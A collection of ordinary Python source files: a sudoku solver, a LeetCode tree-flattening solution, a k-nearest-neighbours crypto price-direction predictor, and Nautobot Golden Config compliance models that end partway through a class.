23680100556 | #grid = [[0 for j in range(9)] for i in range(9)]
import time
def not_complete(board):
    """Return True while the board still contains an unfilled (0) cell."""
    return any(0 in row for row in board)
#will return True if the inputted number is not in the row
def check_row(board, row_num, num):
    """Return True if num does not already appear in row row_num."""
    return num not in board[row_num]
#will return True if inputted number is not in the column
def check_col(board, col_num, num):
    """Return True if num does not already appear in column col_num."""
    return all(board[i][col_num] != num for i in range(9))
def get_box_values(board, row, col):
    """Return the 3x3 box containing (row, col) as a list of three row-slices.

    Replaces the original 9-branch if/elif ladder: the top-left corner of the
    box is just (row // 3 * 3, col // 3 * 3). Valid for row, col in 0..8.
    """
    r0 = (row // 3) * 3
    c0 = (col // 3) * 3
    return [board[r][c0:c0 + 3] for r in range(r0, r0 + 3)]
#returns True if inputted number not in box
def check_box(board, row, col, num):
    """Return True if num does not appear in the 3x3 box containing (row, col)."""
    return all(num not in box_row for box_row in get_box_values(board, row, col))
def find_possibilities(board, pos):
    """List the digits 1-9 that can legally be placed at pos = [row, col]."""
    row, col = pos
    return [num for num in range(1, 10)
            if check_box(board, row, col, num)
            and check_row(board, row, num)
            and check_col(board, col, num)]
def solver(board):
    """Solve the board in place by backtracking.

    Returns the (solved) board, or None if no assignment works.
    """
    if not not_complete(board):
        # No zeros left: the board is solved.
        return board
    # Locate the first empty cell in row-major order.
    row, col = next((r, c) for r in range(9) for c in range(9) if board[r][c] == 0)
    for candidate in find_possibilities(board, [row, col]):
        board[row][col] = candidate
        if solver(board) is not None:
            return board
        # Dead end: undo the guess and try the next candidate.
        board[row][col] = 0
    return None
| jfitz02/Sudoku-Solver | sudoku solver/sudokusolver.py | sudokusolver.py | py | 2,719 | python | en | code | 0 | github-code | 36 |
43914267111 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def flatten(self, root: Optional[TreeNode]) -> None:
        """
        Flatten the tree in place into a right-skewed list in preorder.
        The root is returned so the recursive calls can reuse it.
        """
        if root is None:
            return None
        # Flatten each subtree first, then stitch: root -> left-list -> right-list.
        flat_left = self.flatten(root.left)
        flat_right = self.flatten(root.right)
        root.left = None
        tail = root
        if flat_left:
            tail.right = flat_left
            # Walk to the end of the flattened left list.
            while tail.right:
                tail = tail.right
        tail.right = flat_right
return root | robinsdeepak/leetcode | 114-flatten-binary-tree-to-linked-list/114-flatten-binary-tree-to-linked-list.py | 114-flatten-binary-tree-to-linked-list.py | py | 712 | python | en | code | 0 | github-code | 36 |
2182128872 | import logging
import threading
import numpy as np
import pandas as pd
from timeit import default_timer as timer
from datetime import datetime, timedelta, timezone
from time import sleep
import time
import matplotlib.pyplot as mpl
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import ShuffleSplit
from sklearn.metrics import make_scorer, r2_score
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsRegressor
from utils.history import Historical_Caching
import warnings
warnings.filterwarnings('ignore')
# Configure root logging once at import time and create this module's logger.
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
# Gives a list of timestamps from the start date to the end date
#
# startDate: The start date as a string xxxx-xx-xx
# endDate: The end date as a string year-month-day
# period: 'minute', 'daily', 'weekly', or 'monthly'
# weekends: True if weekends should be included; false otherwise
# return: A numpy array of timestamps
def DateRange(startDate, endDate, period='minute', weekends=True):
    """Build an array of timestamps from startDate to endDate (inclusive).

    Args:
        startDate: Start of the range as a POSIX timestamp (seconds).
        endDate: End of the range as a POSIX timestamp (seconds).
        period: Step size: 'minute', 'daily', 'weekly', or 'monthly'
            (a "month" is 30 days).
        weekends: If False, Saturdays and Sundays are excluded.

    Returns:
        numpy array of POSIX timestamps.

    Raises:
        ValueError: If startDate is after endDate, or period is unknown
            (previously an unknown period crashed later with
            UnboundLocalError on the step variable).
    """
    # The start and end date
    sd = datetime.fromtimestamp(startDate)
    ed = datetime.fromtimestamp(endDate)
    # Invalid start and end dates
    if (sd > ed):
        raise ValueError("The start date cannot be later than the end date.")
    steps = {
        'minute': timedelta(minutes=1),
        'daily': timedelta(1),
        'weekly': timedelta(7),
        'monthly': timedelta(30),
    }
    try:
        prd = steps[period]
    except KeyError:
        raise ValueError("Unknown period: " + repr(period))
    # The final list of timestamp data
    dates = []
    cd = sd
    while (cd <= ed):
        # If weekends are included or it's a weekday append the current ts
        # (weekday() 5/6 are Saturday/Sunday).
        if (weekends or (cd.date().weekday() != 5 and cd.date().weekday() != 6)):
            dates.append(cd.timestamp())
        # Onto the next period
        cd = cd + prd
    return np.array(dates)
# Given a date, returns the previous day
#
# startDate: The start date as a datetime object
# weekends: True if weekends should counted; false otherwise
def DatePrevDay(startDate):
    """Step one interval back from startDate.

    NOTE(review): despite the name, this subtracts one *minute* — the module
    operates on minute-resolution data. Confirm against callers before renaming.

    Args:
        startDate: A datetime object.

    Returns:
        startDate minus one minute.
    """
    return startDate - timedelta(minutes=1)
# Load data from the CSV file. Note: Some systems are unable
# to give timestamps for dates before 1970. This function may
# fail on such systems.
#
# path: The path to the file
# return: A data frame with the parsed timestamps
def ParseData(path):
    """Load price data from a CSV file, retrying until it can be read.

    The read is best-effort: any failure (file missing, busy, half-written)
    just waits half a second and retries forever — callers depend on this
    when the file is being produced concurrently.

    Note: some systems cannot represent timestamps for dates before 1970;
    this function may fail there.

    Args:
        path: Path to the CSV file.

    Returns:
        DataFrame with a 'Timestamp' column replacing the 'Date' column.
    """
    df = None
    while df is None:
        sleep(0.5)
        try:
            df = pd.read_csv(path)
        except Exception:
            # File not readable yet — wait and retry indefinitely.
            sleep(0.5)
    df['Timestamp'] = df['Date']
    # Drop the now-duplicated column (axis=1 selects columns).
    df = df.drop('Date', axis=1)
    return df
# Given dataframe from ParseData
# plot it to the screen
#
# df: Dataframe returned from
# p: The position of the predicted data points
def PlotData(df, p=None):
    """Plot the High series of df against time, highlighting predicted points.

    Args:
        df: Dataframe returned from ParseData (needs Timestamp and High columns).
        p: Index positions of the predicted data points (optional).
    """
    if (p is None):
        p = np.array([])
    # Timestamp data
    ts = df.Timestamp.values
    # Number of x tick marks
    nTicks = 10
    # Left most x value
    s = np.min(ts)
    # Right most x value
    e = np.max(ts)
    # Total range of x values
    r = e - s
    # Add some buffer on both sides
    s -= r / 5
    e += r / 5
    # These will be the tick locations on the x axis
    tickMarks = np.arange(s, e, (e - s) / nTicks)
    # Convert timestamps to human-readable strings for the tick labels
    strTs = [datetime.fromtimestamp(i).strftime('%Y-%m-%d %H:%M:%S') for i in tickMarks]
    mpl.figure()
    # Plot of the actual High values
    mpl.plot(ts, df.High.values, color='#727272', linewidth=1.618, label='Actual')
    # Predicted data was also provided — overlay it at positions p
    if (len(p) > 0):
        mpl.plot(ts[p], df.High.values[p], color='#7294AA', linewidth=1.618, label='Predicted')
    # Set the tick marks
    mpl.xticks(tickMarks, strTs, rotation='vertical')
    # Set y-axis label
    mpl.ylabel('Crypto Price (USD)')
    # Add the label in the upper left
    mpl.legend(loc='upper left')
    mpl.show()
# A class that predicts stock prices based on historical stock data
class Predictor:
# Constructor
# nPrevDays: The number of past days to include
# in a sample.
# rmodel: The regressor model to use (sklearn)
# nPastDays: The number of past days in each feature
# scaler: The scaler object used to scale the data (sklearn)
def __init__(self, rmodel, nPastDays, scaler=StandardScaler()):
self.npd = nPastDays
self.R = rmodel
self.S = scaler
self.D = None
self.D_orig = None
self.DTS = None
self.A = None
self.y = None
self.targCols = None
# Extracts features from stock market data
#
# D: A dataframe from ParseData
# ret: The data matrix of samples
def _ExtractFeat(self, D):
# One row per day of stock data
m = D.shape[0]
# Open, High, Low, and Close for past n days + timestamp and volume
n = self._GetNumFeatures()
B = np.zeros([m, n])
# Preserve order of spreadsheet
for i in range(m - 1, -1, -1):
self._GetSample(B[i], i, D)
# Return the internal numpy array
return B
# Extracts the target values from stock market data
#
# D: A dataframe from ParseData
# ret: The data matrix of targets and the
def _ExtractTarg(self, D):
# Timestamp column is not predicted
tmp = D.drop('Timestamp', axis=1)
# Return the internal numpy array
return tmp.values, tmp.columns
# Get the number of features in the data matrix
#
# n: The number of previous days to include
# self.npd is used if n is None
# ret: The number of features in the data matrix
def _GetNumFeatures(self, n=None):
if (n is None):
n = self.npd
return n * 7 + 1
# Get the sample for a specific row in the dataframe.
# A sample consists of the current timestamp and the data from
# the past n rows of the dataframe
#
# r: The array to fill with data
# i: The index of the row for which to build a sample
# df: The dataframe to use
# return; r
def _GetSample(self, r, i, df):
# First value is the timestamp
r[0] = df['Timestamp'].values[i]
# The number of columns in df
n = df.shape[1]
# The last valid index
lim = df.shape[0]
# Each sample contains the past n days of stock data; for non-existing data
# repeat last available sample
# Format of row:
# Timestamp Volume Open[i] High[i] ... Open[i-1] High[i-1]... etc
for j in range(0, self.npd):
# Subsequent rows contain older data in the spreadsheet
ind = i + j + 1
# If there is no older data, duplicate the oldest available values
if (ind >= lim):
ind = lim - 1
# Add all columns from row[ind]
for k, c in enumerate(df.columns):
# + 1 is needed as timestamp is at index 0
r[k + 1 + n * j] = df[c].values[ind]
return r
# Attempts to learn the stock market data
# given a dataframe taken from ParseData
#
# D: A dataframe from ParseData
def Learn(self, D):
# Keep track of the currently learned data
self.D = D.copy()
self.D_orig = D.copy()
# self.S = StandardScaler(with_mean=True, with_std=True)
# Keep track of old timestamps for indexing
self.DTS = np.asarray(self.D.Timestamp.values)
# Scale the data
self.S.fit(self.D)
self.D[self.D.columns] = self.S.transform(self.D)
# Get features from the data frame
self.A = self._ExtractFeat(self.D)
# Get the target values and their corresponding column names
self.y, self.targCols = self._ExtractTarg(self.D)
# Create the regressor model and fit it
self.R.fit(self.A, self.y)
return True
# Predicts values for each row of the dataframe. Can be used to
# estimate performance of the model
#
# df: The dataframe for which to make prediction
# return: A dataframe containing the predictions
def PredictDF(self, df):
# Make a local copy to prevent modifying df
D = df.copy()
# Scale the input data like the training data
D[D.columns] = self.S.transform(D)
# Get features
A = self._ExtractFeat(D)
# Construct a dataframe to contain the predictions
# Column order was saved earlier
P = pd.DataFrame(index=range(A.shape[0]), columns=self.targCols)
# Perform prediction
P[P.columns] = self.R.predict(A)
# Add the timestamp (already scaled from above)
P['Timestamp'] = D['Timestamp'].values
# Scale the data back to original range
P[P.columns] = self.S.inverse_transform(P)
return P
# Predict the stock price during a specified time
#
# startDate: The start date as a string in yyyy-mm-dd format
# endDate: The end date as a string yyyy-mm-dd format
# period: 'daily', 'weekly', or 'monthly' for the time period
# between predictions
# return: A dataframe containing the predictions or
def PredictDate(self, startDate, endDate, period='minute'):
# Create the range of timestamps and reverse them
ts = DateRange(startDate, endDate, period)[::-1]
m = ts.shape[0]
# Prediction is based on data prior to start date
# Get timestamp of previous day
prevts_ = datetime.fromtimestamp(ts[-1]) - timedelta(minutes=1)
prevts = np.asarray(prevts_.timestamp())
# Test if there is enough data to continue
try:
ind = np.where(self.DTS <= prevts)[0][0]
except IndexError:
logger.info('Safety ON')
ind = 0
pass
# There is enough data to perform prediction; allocate new data frame
P = pd.DataFrame(np.zeros((self.D.shape[0], self.D.shape[1])), index=range(self.D.shape[0]), columns=self.D.columns)
# Add in the timestamp column so that it can be scaled properly
P.loc[int(m):int(self.D.shape[0]), 'Timestamp'] = self.D.loc[0:(int(self.D.shape[0] - m)), 'Timestamp']
P.loc[0:int(m - 1), 'Timestamp'] = ts
for i in range(self.D.shape[0] - m):
# If the current index does not exist, repeat the last valid data
curInd = ind + i
if (curInd >= self.D.shape[0]):
curInd = curInd - 1
# Copy over the past data (already scaled)
P.iloc[int(m + i)] = self.D_orig.xs(int(curInd))
# for i in range(len(P)):
# print(datetime.datetime.fromtimestamp(P.loc[i, 'Timestamp']))
# Scale the timestamp (other fields are 0)
self.S.fit(P)
P[P.columns] = self.S.transform(P)
P = P[0:int(m * 2)]
# B is to be the data matrix of features
B = np.zeros((1, self._GetNumFeatures()))
# Add extra last entries for past existing data
# Loop until end date is reached
# print(P)
for i in range(m - 1, -1, -1):
# Create one sample
self._GetSample(B[0], i, P)
# Predict the row of the dataframe and save it
pred = self.R.predict(B).ravel()
for j, k in zip(self.targCols, pred):
P.at[i, j] = k
# Discard extra rows needed for prediction
# Scale the dataframe back to the original range
P[P.columns] = self.S.inverse_transform(P)
'''for i in range(len(P)):
print(datetime.fromtimestamp(P.loc[i, 'Timestamp']))
print(P)'''
'''j = 0
for i in P.Timestamp:
print(dt.fromtimestamp(i))
j += 1
if j > 10:
break'''
# PlotData(P)
P = P[0:m]
return P
# Test the predictors performance and
# displays results to the screen
#
# D: The dataframe for which to make prediction
def Performance(self, df=None):
# If no dataframe is provided, use the currently learned one
if df is None:
D = self.D.copy()
else:
self.S.fit(df)
D = self.S.transform(df)
# Get features from the data frame
A = self._ExtractFeat(D)
# Get the target values and their corresponding column names
y, _ = self._ExtractTarg(D)
# Begin cross validation
ss = ShuffleSplit(n_splits=1, test_size=0.1, train_size=0.9, random_state=0)
for trn, tst in ss.split(A):
s2 = cross_val_score(self.R, A[tst], y[tst], cv=5, scoring=make_scorer(r2_score), n_jobs=-1)
if len(s2) > 1:
return s2.mean()
elif len(s2) == 1:
logger.info(str(s2))
return s2
else:
return 0
class ML_Calculus:
    """Background machine-learning engine producing a per-minute trade verdict.

    Runs Predictor against cached exchange history on a daemon thread and
    exposes the latest direction verdict via get_p_verdict().
    """

    def __init__(self, ws_bmex, rest, instrument, history_count, per_pred, API_key, API_secret):
        """Wire up history caching, the regressor and the worker thread.

        ws_bmex: websocket client handed to Historical_Caching.
        rest: REST client for the exchange.
        instrument: instrument symbol (also used to name the CSV cache file).
        history_count: number of historical rows to cache.
        per_pred: number of periods ahead to predict (stored as per_pred - 1).
        API_key / API_secret: exchange credentials (stored, not used here).
        """
        self.client = rest
        self.instrument_bmex = instrument
        self.API_key_bmex = API_key
        self.API_secret_bmex = API_secret
        self.periods_pred = per_pred - 1
        # Latest verdict: >0 up, <0 down, 0 neutral/unknown
        self.p_verdict = 0
        self.D = None
        self.ready = False
        self.history = Historical_Caching(ws_bmex, rest, instrument, history_count)
        self.thread = threading.Thread(target=self.Engine)
        self.R = KNeighborsRegressor(n_neighbors=10, weights='distance', algorithm='auto', leaf_size=25, n_jobs=-1)
        self.sp_Classic = Predictor(rmodel=self.R, nPastDays=50)
        self.logger = logging.getLogger(__name__)

    def Main(self, args):
        """Run one learn/predict/score cycle.

        args: [csv_path, start_ts, end_ts] optionally followed by a period
            code ('m'/'D'/'W'/'M').
        Returns (iterations, predictions_dataframe, r2_mean), or (0, 0, 0)
        on failure, or None when args has the wrong length.
        """
        if (len(args) != 3 and len(args) != 4):
            return
        # Test if file exists
        # NOTE(review): this open() is never closed — the handle leaks each
        # call; consider `with open(args[0]): pass` instead. TODO confirm.
        try:
            open(args[0])
        except Exception as e:
            logger.error('Error opening args: ' + args[0])
            logger.error(str(e))
            return
        if (len(args) == 4):
            # Expand the single-letter period code; presumably intended for
            # PredictDate, but predPrd is never passed on — TODO confirm.
            predPrd = args[3]
            if predPrd == 'm':
                predPrd = 'minute'
            if predPrd == 'D':
                predPrd = 'daily'
            if predPrd == 'W':
                predPrd = 'weekly'
            if predPrd == 'M':
                predPrd = 'monthly'
        try:
            # Everything looks okay; proceed with program
            # Grab the data frame
            self.D = None
            self.D = ParseData(args[0])
            s2_mean = 0
            P = None
            i = 0
            res = 0
            # NOTE(review): this loop runs exactly once (res goes 0 -> 1)
            while res < 1:
                self.sp_Classic.Learn(self.D)
                res += 1
            # Retry prediction up to 3 times until the r2 score is acceptable
            while s2_mean < 0.70 and i < 3:
                P = self.sp_Classic.PredictDate(args[1], args[2])
                if P is None:
                    logger.info(self.instrument_bmex + ': TYPE 2 Reboot')
                    return 0, 0, 0
                s2_mean = self.sp_Classic.Performance()
                i += 1
            return i, P, s2_mean
        except Exception as e:
            logger.error(str(e))
            sleep(1)
            return 0, 0, 0

    def Engine(self):
        """Worker loop: once per minute, predict and publish a verdict.

        Blocks until historical data is loaded, then loops forever; all
        exceptions are logged and the loop continues.
        """
        datetime_minute_cached = None
        fails = 0
        self.history.start_supplychain()
        # Wait until the history cache has finished its initial load
        while self.history.get_data_loaded() is False or self.history.get_run_completed() is False:
            logger.info(self.instrument_bmex + ': Waiting for historical data... ')
            sleep(5)
            continue
        logger.info(self.instrument_bmex + ': Starting machine learning computation...')
        while True:
            try:
                # Only recompute when the wall-clock minute has changed
                if datetime_minute_cached != datetime.utcnow().minute:  # and self.history.get_run_completed() is True:
                    start_timer = timer()
                    # Build [start_ts, end_ts] spanning the current minute to
                    # periods_pred minutes ahead (UTC, second-truncated)
                    timestamp_ = datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:00')
                    timestamp = datetime.strptime(timestamp_, '%Y-%m-%d %H:%M:%S').replace(tzinfo=timezone.utc)
                    timestamp = timestamp.timetuple()
                    start_ts = time.mktime(timestamp)
                    timestamp = datetime.strptime(timestamp_, '%Y-%m-%d %H:%M:%S').replace(tzinfo=timezone.utc) + timedelta(minutes=(self.periods_pred))
                    timestamp = timestamp.timetuple()
                    end_ts = time.mktime(timestamp)
                    naming = str(self.instrument_bmex + "_pair_m1.csv")
                    p = None
                    counter = 0
                    # Retry Main until it yields a DataFrame (max 5 attempts)
                    while isinstance(p, pd.DataFrame) is False and counter < 5:
                        i, p, s2_mean = self.Main([naming, start_ts, end_ts, 'm'])
                        counter += 1
                    if counter >= 5:
                        logger.warning(self.instrument_bmex + ': Predictor: Error p format')
                        continue
                    elif s2_mean < 0.70:
                        # Model quality below threshold: publish neutral verdict
                        self.p_verdict = 0
                        logger.info(self.instrument_bmex + ' Processing Time: ' + str(round(timer() - start_timer, 5)))
                        logger.info(self.instrument_bmex + ': Machine learning : UNCONCLUSIVE !')
                        self.ready = True
                        fails += 1
                        datetime_minute_cached = datetime.utcnow().minute
                    else:
                        if np.isnan(s2_mean):
                            self.p_verdict = 0
                        else:
                            # Count monotone moves across the predicted closes:
                            # j = strictly rising steps, k = strictly falling steps
                            temp = self.periods_pred - 1
                            # NOTE(review): temp_1 and temp_2 start identical —
                            # presumably intentional seed values; confirm.
                            temp_1 = p.loc[temp + 1, 'Close']
                            temp_2 = p.loc[temp + 1, 'Close']
                            j = 0
                            k = 0
                            while temp >= 0:
                                p_close_tx = p.loc[temp, 'Close']
                                if temp_1 < p_close_tx:
                                    j += 1
                                elif temp_2 > p_close_tx:
                                    k += 1
                                temp_1 = temp_2 = p_close_tx
                                temp -= 1
                            # All steps rising -> -1 (DOWN verdict below),
                            # all steps falling -> +1; mixed -> neutral
                            if j >= self.periods_pred:
                                self.p_verdict = -1
                            elif k >= self.periods_pred:
                                self.p_verdict = 1
                            else:
                                self.p_verdict = 0
                        logger.info(self.instrument_bmex + ' Processing Time: ' + str(round(timer() - start_timer, 5)))
                        if self.p_verdict == 0:
                            logger.info(self.instrument_bmex + ' -> Machine learning : NEUTRAL !')
                        elif self.p_verdict > 0:
                            logger.info(self.instrument_bmex + ' -> Machine learning : UP !')
                        else:
                            logger.info(self.instrument_bmex + ' -> Machine learning : DOWN !')
                        self.ready = True
                        datetime_minute_cached = datetime.utcnow().minute
                        fails = 0
                        logger.info(self.instrument_bmex + ' -> Machine learning / Non-gaussian metric : ' + str(round(s2_mean * 100, 2)) + "% (iter: " + str(i) + ")")
                sleep(0.1)
            except Exception as e:
                logger.error(str(e))
                sleep(1)
                pass

    def start_ml(self):
        """Start the Engine loop on a daemon thread."""
        self.thread.daemon = True
        self.thread.start()

    def get_p_verdict(self):
        """Return the current verdict normalized to -1, 0 or 1."""
        if self.p_verdict > 0:
            verdict = 1
        elif self.p_verdict < 0:
            verdict = -1
        else:
            verdict = 0
        return verdict
| 5ymph0en1x/SyDOM | utils/predictor.py | predictor.py | py | 21,887 | python | en | code | 82 | github-code | 36 |
21131384578 | """Django Models for tracking the configuration compliance per feature and device."""
import json
import logging
from deepdiff import DeepDiff
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.module_loading import import_string
from hier_config import Host as HierConfigHost
from nautobot.core.models.generics import PrimaryModel
from nautobot.core.models.utils import serialize_object, serialize_object_v2
from nautobot.dcim.models import Device
from nautobot.extras.models import ObjectChange
from nautobot.extras.models.statuses import StatusField
from nautobot.extras.utils import extras_features
from netutils.config.compliance import feature_compliance
from nautobot_golden_config.choices import ComplianceRuleConfigTypeChoice, ConfigPlanTypeChoice, RemediationTypeChoice
from nautobot_golden_config.utilities.constant import ENABLE_SOTAGG, PLUGIN_CFG
LOGGER = logging.getLogger(__name__)

# Required prefix for SoT aggregation GraphQL queries; enforced in GoldenConfigSetting.clean().
GRAPHQL_STR_START = "query ($device_id: ID!)"

# Shared preamble for errors raised when a user-supplied custom compliance function misbehaves.
ERROR_MSG = (
    "There was an issue with the data that was returned by your get_custom_compliance function. "
    "This is a local issue that requires the attention of your systems administrator and not something "
    "that can be fixed within the Golden Config plugin. "
)
# Raised when a required key is absent from the custom function's result.
MISSING_MSG = (
    ERROR_MSG + "Specifically the `{}` key was not found in value the get_custom_compliance function provided."
)
# Raised when a key's value has the wrong type.
VALIDATION_MSG = (
    ERROR_MSG + "Specifically the key {} was expected to be of type(s) {} and the value of {} was not that type(s)."
)
# Maps plugin-config setting names to the FUNC_MAPPER key each custom callable registers under.
CUSTOM_FUNCTIONS = {
    "get_custom_compliance": "custom",
    "get_custom_remediation": RemediationTypeChoice.TYPE_CUSTOM,
}
def _is_jsonable(val):
"""Check is value can be converted to json."""
try:
json.dumps(val)
return True
except (TypeError, OverflowError):
return False
def _null_to_empty(val):
"""Convert to empty string if the value is currently null."""
if not val:
return ""
return val
def _get_cli_compliance(obj):
    """Perform compliance evaluation for CLI-style configuration.

    Args:
        obj (ConfigCompliance): instance providing ``rule``, ``actual``,
            ``intended`` and ``device`` attributes.

    Returns:
        dict: ``compliance``, ``compliance_int``, ``ordered``, ``missing`` and
        ``extra`` keys in the shape ``ConfigCompliance.compliance_on_save`` expects.
    """
    feature = {
        "ordered": obj.rule.config_ordered,
        "name": obj.rule,
        # The parent-most configuration lines to match (one per line).
        "section": obj.rule.match_config.splitlines(),
    }
    value = feature_compliance(
        feature, obj.actual, obj.intended, obj.device.platform.network_driver_mappings.get("netutils_parser")
    )
    compliance = value["compliant"]
    # Both branches of the previous if/else assigned `ordered` identically,
    # and compliance_int is just the integer form of the boolean.
    return {
        "compliance": compliance,
        "compliance_int": 1 if compliance else 0,
        "ordered": value["ordered_compliant"],
        "missing": _null_to_empty(value["missing"]),
        "extra": _null_to_empty(value["extra"]),
    }
def _get_json_compliance(obj):
    """Perform compliance evaluation for JSON-serializable configuration data."""

    def _changed_keys(diff, change_kind):
        """Flatten a DeepDiff result into the keys and list indexes that changed."""
        dict_changes = list(diff.get(f"dictionary_item_{change_kind}", []))
        iterable_changes = list(diff.get(f"iterable_item_{change_kind}", {}).keys())
        value_changes = list(diff.get("values_changed", {}).keys())
        type_changes = list(diff.get("type_changes", {}).keys())
        return dict_changes + iterable_changes + value_changes + type_changes

    diff = DeepDiff(obj.actual, obj.intended, ignore_order=obj.ordered, report_repetition=True)
    if diff:
        # Any difference means non-compliant; report what is missing/extra.
        return {
            "compliance": False,
            "compliance_int": 0,
            "ordered": False,
            "missing": _null_to_empty(_changed_keys(diff, "added")),
            "extra": _null_to_empty(_changed_keys(diff, "removed")),
        }
    # No diff at all: fully compliant.
    return {
        "compliance": True,
        "compliance_int": 1,
        "ordered": True,
        "missing": "",
        "extra": "",
    }
def _verify_get_custom_compliance_data(compliance_details):
"""This function verifies the data is as expected when a custom function is used."""
for val in ["compliance", "compliance_int", "ordered", "missing", "extra"]:
try:
compliance_details[val]
except KeyError:
raise ValidationError(MISSING_MSG.format(val)) from KeyError
for val in ["compliance", "ordered"]:
if compliance_details[val] not in [True, False]:
raise ValidationError(VALIDATION_MSG.format(val, "Boolean", compliance_details[val]))
if compliance_details["compliance_int"] not in [0, 1]:
raise ValidationError(VALIDATION_MSG.format("compliance_int", "0 or 1", compliance_details["compliance_int"]))
for val in ["missing", "extra"]:
if not isinstance(compliance_details[val], str) and not _is_jsonable(compliance_details[val]):
raise ValidationError(VALIDATION_MSG.format(val, "String or Json", compliance_details[val]))
def _get_hierconfig_remediation(obj):
    """Generate remediation configuration for ``obj`` using hier_config.

    Args:
        obj (ConfigCompliance): instance providing ``device``, ``rule``,
            ``intended`` and ``actual`` attributes.

    Returns:
        str: the remediation configuration text.

    Raises:
        ValidationError: when the platform is unsupported by hier_config or
            has no RemediationSetting defined.
    """
    hierconfig_os = obj.device.platform.network_driver_mappings["hier_config"]
    if not hierconfig_os:
        # BUGFIX: ConfigCompliance has no `network_driver` attribute; the
        # driver name lives on the device's platform.
        raise ValidationError(f"platform {obj.device.platform.network_driver} is not supported by hierconfig.")
    try:
        remediation_setting_obj = RemediationSetting.objects.get(platform=obj.rule.platform)
    except Exception as err:  # pylint: disable=broad-except:
        raise ValidationError(
            f"Platform {obj.device.platform.network_driver} has no Remediation Settings defined."
        ) from err
    remediation_options = remediation_setting_obj.remediation_options
    try:
        hc_kwargs = {"hostname": obj.device.name, "os": hierconfig_os}
        # Only pass hconfig_options through when the setting defines any.
        if remediation_options:
            hc_kwargs.update(hconfig_options=remediation_options)
        host = HierConfigHost(**hc_kwargs)
    except Exception as err:  # pylint: disable=broad-except:
        raise Exception(  # pylint: disable=broad-exception-raised
            f"Cannot instantiate HierConfig on {obj.device.name}, check Device, Platform and Hier Options."
        ) from err
    # Load both configs, build the remediation, and return it as plain text.
    host.load_generated_config(obj.intended)
    host.load_running_config(obj.actual)
    host.remediation_config()
    remediation_config = host.remediation_config_filtered_text(include_tags={}, exclude_tags={})
    return remediation_config
# Map each built-in compliance/remediation type to its implementation.
FUNC_MAPPER = {
    ComplianceRuleConfigTypeChoice.TYPE_CLI: _get_cli_compliance,
    ComplianceRuleConfigTypeChoice.TYPE_JSON: _get_json_compliance,
    RemediationTypeChoice.TYPE_HIERCONFIG: _get_hierconfig_remediation,
}
# Conditionally register user-provided callables configured in the plugin
# settings (dotted import path strings).
for custom_function, custom_type in CUSTOM_FUNCTIONS.items():
    if PLUGIN_CFG.get(custom_function):
        try:
            FUNC_MAPPER[custom_type] = import_string(PLUGIN_CFG[custom_function])
        except Exception as error:  # pylint: disable=broad-except
            # BUGFIX: added the missing space after "of" in the error message.
            msg = (
                "There was an issue attempting to import the custom function of "
                f"{PLUGIN_CFG[custom_function]}, this is expected with a local configuration issue "
                "and not related to the Golden Configuration Plugin, please contact your system admin for further details"
            )
            raise Exception(msg).with_traceback(error.__traceback__)
@extras_features(
    "custom_fields",
    "custom_validators",
    "export_templates",
    "graphql",
    "relationships",
    "webhooks",
)
class ComplianceFeature(PrimaryModel):  # pylint: disable=too-many-ancestors
    """A named configuration feature (e.g. AAA, NTP) that ComplianceRules group under."""

    # Human-readable unique name.
    name = models.CharField(max_length=100, unique=True)
    # URL-safe unique identifier; also the ordering and display key.
    slug = models.SlugField(max_length=100, unique=True)
    description = models.CharField(max_length=200, blank=True)

    class Meta:
        """Meta information for ComplianceFeature model."""

        ordering = ("slug",)

    def __str__(self):
        """Return a sane string representation of the instance."""
        return self.slug
@extras_features(
    "custom_fields",
    "custom_validators",
    "export_templates",
    "graphql",
    "relationships",
    "webhooks",
)
class ComplianceRule(PrimaryModel):  # pylint: disable=too-many-ancestors
    """A per-platform rule describing how one ComplianceFeature is evaluated."""

    feature = models.ForeignKey(to="ComplianceFeature", on_delete=models.CASCADE, related_name="feature")
    platform = models.ForeignKey(
        to="dcim.Platform",
        on_delete=models.CASCADE,
        related_name="compliance_rules",
    )
    description = models.CharField(
        max_length=200,
        blank=True,
    )
    config_ordered = models.BooleanField(
        verbose_name="Configured Ordered",
        help_text="Whether or not the configuration order matters, such as in ACLs.",
        default=False,
    )
    config_remediation = models.BooleanField(
        default=False,
        verbose_name="Config Remediation",
        help_text="Whether or not the config remediation is executed for this compliance rule.",
    )
    match_config = models.TextField(
        blank=True,
        verbose_name="Config to Match",
        help_text="The config to match that is matched based on the parent most configuration. E.g.: For CLI `router bgp` or `ntp`. For JSON this is a top level key name.",
    )
    config_type = models.CharField(
        max_length=20,
        default=ComplianceRuleConfigTypeChoice.TYPE_CLI,
        choices=ComplianceRuleConfigTypeChoice,
        help_text="Whether the configuration is in CLI or JSON/structured format.",
    )
    custom_compliance = models.BooleanField(
        default=False, help_text="Whether this Compliance Rule is proceeded as custom."
    )

    @property
    def remediation_setting(self):
        """Return the RemediationSetting for this rule's platform, or None if none exists."""
        return RemediationSetting.objects.filter(platform=self.platform).first()

    class Meta:
        """Meta information for ComplianceRule model."""

        ordering = ("platform", "feature__name")
        # One rule per (feature, platform) pair.
        unique_together = (
            "feature",
            "platform",
        )

    def __str__(self):
        """Return a sane string representation of the instance."""
        return f"{self.platform} - {self.feature.name}"

    def clean(self):
        """Verify that if the rule is CLI-based, match_config is set."""
        if self.config_type == ComplianceRuleConfigTypeChoice.TYPE_CLI and not self.match_config:
            raise ValidationError("CLI configuration set, but no configuration set to match.")
@extras_features(
    "custom_fields",
    "custom_links",
    "custom_validators",
    "export_templates",
    "graphql",
    "relationships",
    "webhooks",
)
class ConfigCompliance(PrimaryModel):  # pylint: disable=too-many-ancestors
    """Per-device, per-rule compliance result; computed automatically on save()."""

    device = models.ForeignKey(to="dcim.Device", on_delete=models.CASCADE, help_text="The device")
    rule = models.ForeignKey(to="ComplianceRule", on_delete=models.CASCADE, related_name="rule")
    compliance = models.BooleanField(blank=True)
    actual = models.JSONField(blank=True, help_text="Actual Configuration for feature")
    intended = models.JSONField(blank=True, help_text="Intended Configuration for feature")
    # these three are config snippets exposed for the ConfigDeployment.
    remediation = models.JSONField(blank=True, help_text="Remediation Configuration for the device")
